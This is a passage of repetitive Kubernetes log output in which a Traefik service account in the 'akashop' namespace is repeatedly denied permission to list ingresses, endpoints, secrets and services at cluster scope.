"system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:29:30.779232 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:29:30.779269 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:29:31.728696 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:29:31.728732 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:30:01.407752 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:30:01.407816 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:30:04.775011 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:30:04.775097 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:30:09.427250 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:30:09.427354 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:30:10.088138 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:30:10.088276 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:30:34.068234 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:30:34.068344 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:30:38.832141 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:30:38.832183 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:30:57.274663 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:30:57.274695 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:31:04.320238 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:31:04.320273 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:31:12.997080 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:31:12.997119 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:31:22.366721 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:31:22.366749 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:31:37.671929 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:31:37.672018 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:31:48.593241 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:31:48.593366 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:32:04.625934 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:32:04.625970 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:32:20.793124 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:32:20.793157 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:32:32.547289 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:32:32.547325 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:32:40.771341 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:32:40.771382 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:32:51.607049 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:32:51.607087 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:33:02.187511 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:33:02.187546 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:33:24.653118 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:33:24.653153 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:33:29.840957 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:33:29.840985 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:33:42.989549 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:33:42.989586 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:33:49.133642 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:33:49.133671 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:34:02.417323 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:34:02.417359 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:34:02.647399 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:34:02.647576 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:34:31.269282 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:34:31.269533 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:34:39.963616 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:34:39.963666 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:34:43.689369 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:34:43.689413 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:35:00.364627 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:35:00.364685 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:35:18.952689 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:35:18.952733 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:35:20.552787 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:35:20.552841 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:35:36.828887 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:35:36.828952 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:35:45.519405 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:35:45.519455 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:36:15.274741 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:36:15.274780 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:36:15.469855 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:36:15.469891 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:36:32.202170 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:36:32.202201 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:36:35.552835 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:36:35.552872 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:36:50.239579 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:36:50.239607 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:36:52.293141 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:36:52.293166 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:37:08.314296 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:37:08.314338 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:37:22.043465 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:37:22.043517 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:37:31.273480 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:37:31.273534 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:37:47.111035 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:37:47.111071 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:37:57.704191 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:37:57.704234 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:38:00.181340 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:38:00.181594 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:38:16.859760 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:38:16.859801 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:38:40.307326 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:38:40.307367 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:38:46.886408 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:38:46.886442 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:38:48.574778 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:38:48.574824 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:39:00.878776 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:39:00.878814 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:39:26.265916 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:39:26.266017 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:39:38.852585 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:39:38.852618 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:39:41.885239 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:39:41.885514 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:39:57.989348 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:39:57.989404 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:40:10.578455 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:40:10.578508 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:40:12.125710 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the 